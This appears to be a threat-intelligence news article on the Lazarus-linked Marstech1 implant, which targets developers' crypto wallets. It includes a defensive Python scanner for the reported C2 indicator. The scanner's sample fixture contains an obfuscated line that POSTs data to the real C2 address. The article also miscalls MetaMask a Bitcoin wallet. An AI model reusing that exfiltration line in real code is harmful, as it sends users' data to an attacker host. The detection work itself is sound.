The notorious North Korean-backed Lazarus hacking group is the alleged operator of the previously unreported JavaScript implant known as Marstech1.
The new campaign is described as a narrowly targeted attack on developers, and researchers have dubbed the ongoing operation Marstech Mayhem. The malware is delivered via an open-source repository hosted on GitHub and associated with a profile named “SuccessFriend.”
The profile, which has been active since July 2024, is no longer accessible on the code hosting platform.
The Marstech1 implant can be placed in webpages and packages.
Analysis shows that the Marstech1 implant is intended to capture system information. The researchers also noted that it can be embedded in webpages and NPM packages, creating a supply chain risk.
Evidence indicates that the malware first appeared in late December last year. As of now, at least 233 verified victims have been identified across several regions, including the US, Europe, and Asia.
The profile described web development skills and an interest in learning blockchain, consistent with Lazarus’ known interests. The threat actor committed both pre-obfuscated and obfuscated payloads to different GitHub repositories.
However, the implant in the GitHub repository differs from the version provided directly from the command-and-control (C2) server, implying that it is still in active development.
Its primary purpose is to search through Chromium-based browser folders on various operating systems and modify extension-related settings, especially those linked to the MetaMask Bitcoin wallet. It can also download additional payloads from the same host over port 3001.
Other wallets targeted by the malware include Exodus and Atomic for Windows, Linux, and macOS. The collected data is subsequently exfiltrated to the command-and-control endpoint “74.119.194[.]129:3000/uploads.”
The Marstech1 implant employs layered obfuscation techniques ranging from control flow flattening and dynamic variable renaming in JavaScript to multi-stage XOR decryption in Python. This detail highlights the threat actor’s sophisticated approach to evading static and dynamic analysis.
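As an added example (not code from the report or from any vendor it cites), the following defender-side audit scans a package tree for the network indicator described above and applies a simple string-hiding heuristic. The escape-density heuristic, its threshold, and the sample files are my assumptions, not a published Marstech1 signature.

```python
"""Audit JavaScript files for the reported Marstech1 C2 indicator and a
string-hiding heuristic. Added example; the heuristic is an assumption."""
import os
import re

# Network indicator from the report (defanged there as 74.119.194[.]129:3000/uploads).
C2_HOST = "74.119.194.129"
C2_PORTS = {3000, 3001}            # exfiltration and second-stage download ports
URL_RE = re.compile(r"https?://([\w.\-]+):(\d+)(/[\w/.\-]*)?")
# Assumption: a high density of \xNN / \uNNNN escapes is a cheap proxy for
# obfuscated string tables; tune the threshold against your own code base.
ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
ESCAPE_DENSITY_THRESHOLD = 0.03

def scan_source(text: str) -> list[str]:
    """Return the reasons a JavaScript source is suspicious (empty if none)."""
    reasons = []
    if C2_HOST in text:
        reasons.append(f"references reported C2 host {C2_HOST}")
    for host, port, path in URL_RE.findall(text):
        if int(port) in C2_PORTS:
            reasons.append(f"contacts {host}:{port}{path} on a port used by the implant")
    compact = re.sub(r"\s+", "", text)
    if compact:
        density = len(ESCAPE_RE.findall(compact)) / len(compact)
        if density >= ESCAPE_DENSITY_THRESHOLD:
            reasons.append(f"escape-sequence density {density:.2f} suggests hidden strings")
    return reasons

def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan an in-memory {path: source} mapping; return only flagged paths."""
    return {p: r for p, s in files.items() if (r := scan_source(s))}

def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan every .js file below root (e.g. a project's node_modules directory)."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_files(files)

# Constructed sample inputs: one benign module and one mimicking the indicators.
SAMPLES = {
    "node_modules/legit-lib/index.js": "module.exports = (a, b) => a + b;\n",
    "node_modules/helper-util/post.js": (
        "var _0x1a=['\\x75\\x70\\x6c\\x6f\\x61\\x64\\x73','\\x66\\x65\\x74\\x63\\x68'];\n"
        "fetch('http://74.119.194.129:3000/uploads',{method:'POST',body:d});\n"
    ),
}

if __name__ == "__main__":
    for path, reasons in scan_files(SAMPLES).items():
        print(path, "->", "; ".join(reasons))
```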
This development follows reports of an attack on at least three cryptocurrency-related firms, including a market-making company, an online casino, and a software development company. That campaign was allegedly part of the Contagious Interview operation between October and November 2024.
